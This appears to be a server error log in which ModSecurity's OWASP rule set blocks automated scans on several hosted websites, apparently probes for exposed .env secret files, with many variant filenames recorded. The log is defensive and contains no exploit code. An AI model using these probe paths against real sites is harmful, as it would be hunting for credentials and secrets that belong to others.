[Mon May 11 11:35:32.100874 2026] [security2:error] [pid 1256241:tid 1256247] [client 185.177.72.9:60956] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/staging/.env.dist_backup"] [unique_id "agGi5JkIEwRJMyDaV55JDAAAAUE"]
[Mon May 11 11:35:33.274192 2026] [security2:error] [pid 1256241:tid 1256247] [client 185.177.72.9:60956] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGi5JkIEwRJMyDaV55JDAAAAUE"]
[Mon May 11 11:35:33.296497 2026] [security2:error] [pid 1254179:tid 1254200] [client 185.177.72.9:50600] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env.dist_backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/staging/.env.dist_backup"] [unique_id "agGi5WS6k_SCYd1AVZqpQAAAARM"]
[Mon May 11 11:35:33.297120 2026] [security2:error] [pid 1254179:tid 1254200] [client 185.177.72.9:50600] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/staging/.env.dist_backup"] [unique_id "agGi5WS6k_SCYd1AVZqpQAAAARM"]
[Mon May 11 11:35:34.502436 2026] [security2:error] [pid 1254179:tid 1254200] [client 185.177.72.9:50600] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGi5WS6k_SCYd1AVZqpQAAAARM"]
[Mon May 11 11:35:39.437251 2026] [security2:error] [pid 1254212:tid 1254226] [client 185.177.72.9:50666] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /static/.env.tmp.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/static/.env.tmp.dev"] [unique_id "agGi60YQeUtAPynIs6xTJwAAAAw"]
[Mon May 11 11:35:39.437412 2026] [security2:error] [pid 1254212:tid 1254226] [client 185.177.72.9:50666] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/static/.env.tmp.dev"] [unique_id "agGi60YQeUtAPynIs6xTJwAAAAw"]
[Mon May 11 11:35:39.614225 2026] [authz_core:error] [pid 1256241:tid 1256248] [client 88.88.156.124:41048] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/abstracts/error_log
[Mon May 11 11:35:40.609949 2026] [security2:error] [pid 1254212:tid 1254226] [client 185.177.72.9:50666] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGi60YQeUtAPynIs6xTJwAAAAw"]
[Mon May 11 11:35:40.636540 2026] [security2:error] [pid 1254133:tid 1254157] [client 185.177.72.9:50670] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /static/.env.tmp.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/static/.env.tmp.dev"] [unique_id "agGi7BjZymfuKpjWXeh3sAAAANU"]
[Mon May 11 11:35:40.636749 2026] [security2:error] [pid 1254133:tid 1254157] [client 185.177.72.9:50670] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/static/.env.tmp.dev"] [unique_id "agGi7BjZymfuKpjWXeh3sAAAANU"]
[Mon May 11 11:35:41.134999 2026] [authz_core:error] [pid 1256241:tid 1256248] [client 88.88.156.124:41048] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/abstracts/error_log
[Mon May 11 11:35:41.649949 2026] [security2:error] [pid 1254242:tid 1254265] [client 8.215.24.140:52068] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.env"] [unique_id "agGi7b4KNmD_mZ_vlf8zaAAAAFQ"]
[Mon May 11 11:35:41.650166 2026] [security2:error] [pid 1254242:tid 1254265] [client 8.215.24.140:52068] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.env"] [unique_id "agGi7b4KNmD_mZ_vlf8zaAAAAFQ"]
[Mon May 11 11:35:41.796325 2026] [security2:error] [pid 1254242:tid 1254265] [client 8.215.24.140:52068] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGi7b4KNmD_mZ_vlf8zaAAAAFQ"]
[Mon May 11 11:35:41.871287 2026] [security2:error] [pid 1254133:tid 1254157] [client 185.177.72.9:50670] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGi7BjZymfuKpjWXeh3sAAAANU"]
[Mon May 11 11:35:42.172468 2026] [security2:error] [pid 1254242:tid 1254265] [client 8.215.24.140:52068] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/dev/.env"] [unique_id "agGi7r4KNmD_mZ_vlf8zcgAAAFQ"]
[Mon May 11 11:35:42.172613 2026] [security2:error] [pid 1254242:tid 1254265] [client 8.215.24.140:52068] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/dev/.env"] [unique_id "agGi7r4KNmD_mZ_vlf8zcgAAAFQ"]
[Mon May 11 11:35:42.230728 2026] [security2:error] [pid 1254242:tid 1254265] [client 8.215.24.140:52068] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGi7r4KNmD_mZ_vlf8zcgAAAFQ"]
[Mon May 11 11:35:42.422899 2026] [security2:error] [pid 1254242:tid 1254265] [client 8.215.24.140:52068] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/api/.env"] [unique_id "agGi7r4KNmD_mZ_vlf8zdwAAAFQ"]
[Mon May 11 11:35:42.423060 2026] [security2:error] [pid 1254242:tid 1254265] [client 8.215.24.140:52068] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/api/.env"] [unique_id "agGi7r4KNmD_mZ_vlf8zdwAAAFQ"]
[Mon May 11 11:35:42.483456 2026] [security2:error] [pid 1254242:tid 1254265] [client 8.215.24.140:52068] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGi7r4KNmD_mZ_vlf8zdwAAAFQ"]
[Mon May 11 11:35:42.677369 2026] [authz_core:error] [pid 1256241:tid 1256248] [client 88.88.156.124:41048] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/abstracts/error_log
[Mon May 11 11:35:44.206272 2026] [authz_core:error] [pid 1256241:tid 1256248] [client 88.88.156.124:41048] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/abstracts/error_log
[Mon May 11 11:35:54.398529 2026] [security2:error] [pid 1254133:tid 1254158] [client 185.177.72.9:31364] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.copy5"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/storage/.env.copy5"] [unique_id "agGi-hjZymfuKpjWXeh36AAAANY"]
[Mon May 11 11:35:54.398905 2026] [security2:error] [pid 1254133:tid 1254158] [client 185.177.72.9:31364] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/storage/.env.copy5"] [unique_id "agGi-hjZymfuKpjWXeh36AAAANY"]
[Mon May 11 11:35:55.755723 2026] [security2:error] [pid 1254133:tid 1254158] [client 185.177.72.9:31364] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGi-hjZymfuKpjWXeh36AAAANY"]
[Mon May 11 11:35:55.782019 2026] [security2:error] [pid 1254179:tid 1254185] [client 185.177.72.9:31376] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.copy5"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/storage/.env.copy5"] [unique_id "agGi-2S6k_SCYd1AVZqpiQAAAQQ"]
[Mon May 11 11:35:55.782591 2026] [security2:error] [pid 1254179:tid 1254185] [client 185.177.72.9:31376] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/storage/.env.copy5"] [unique_id "agGi-2S6k_SCYd1AVZqpiQAAAQQ"]
[Mon May 11 11:35:57.168598 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:31378] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.prod.min"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/storage/.env.prod.min"] [unique_id "agGi_RjZymfuKpjWXeh36wAAAM8"]
[Mon May 11 11:35:57.168811 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:31378] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/storage/.env.prod.min"] [unique_id "agGi_RjZymfuKpjWXeh36wAAAM8"]
[Mon May 11 11:35:57.171814 2026] [security2:error] [pid 1254179:tid 1254185] [client 185.177.72.9:31376] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGi-2S6k_SCYd1AVZqpiQAAAQQ"]
[Mon May 11 11:35:58.343283 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:31378] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGi_RjZymfuKpjWXeh36wAAAM8"]
[Mon May 11 11:35:58.371708 2026] [security2:error] [pid 1254212:tid 1254229] [client 185.177.72.9:31386] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.prod.min"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/storage/.env.prod.min"] [unique_id "agGi_kYQeUtAPynIs6xTagAAAA8"]
[Mon May 11 11:35:58.371926 2026] [security2:error] [pid 1254212:tid 1254229] [client 185.177.72.9:31386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/storage/.env.prod.min"] [unique_id "agGi_kYQeUtAPynIs6xTagAAAA8"]
[Mon May 11 11:35:59.627152 2026] [security2:error] [pid 1254212:tid 1254229] [client 185.177.72.9:31386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGi_kYQeUtAPynIs6xTagAAAA8"]
[Mon May 11 11:35:59.654183 2026] [security2:error] [pid 1254179:tid 1254186] [client 185.177.72.9:31400] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.test-new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/storage/.env.test-new"] [unique_id "agGi_2S6k_SCYd1AVZqpmwAAAQU"]
[Mon May 11 11:35:59.654636 2026] [security2:error] [pid 1254179:tid 1254186] [client 185.177.72.9:31400] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/storage/.env.test-new"] [unique_id "agGi_2S6k_SCYd1AVZqpmwAAAQU"]
[Mon May 11 11:36:00.859905 2026] [security2:error] [pid 1254179:tid 1254186] [client 185.177.72.9:31400] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGi_2S6k_SCYd1AVZqpmwAAAQU"]
[Mon May 11 11:36:00.885508 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:31414] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.test-new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/storage/.env.test-new"] [unique_id "agGjAERdw2n9wv6Ai48DCgAAAIg"]
[Mon May 11 11:36:00.885708 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:31414] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/storage/.env.test-new"] [unique_id "agGjAERdw2n9wv6Ai48DCgAAAIg"]
[Mon May 11 11:36:02.102337 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:31414] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjAERdw2n9wv6Ai48DCgAAAIg"]
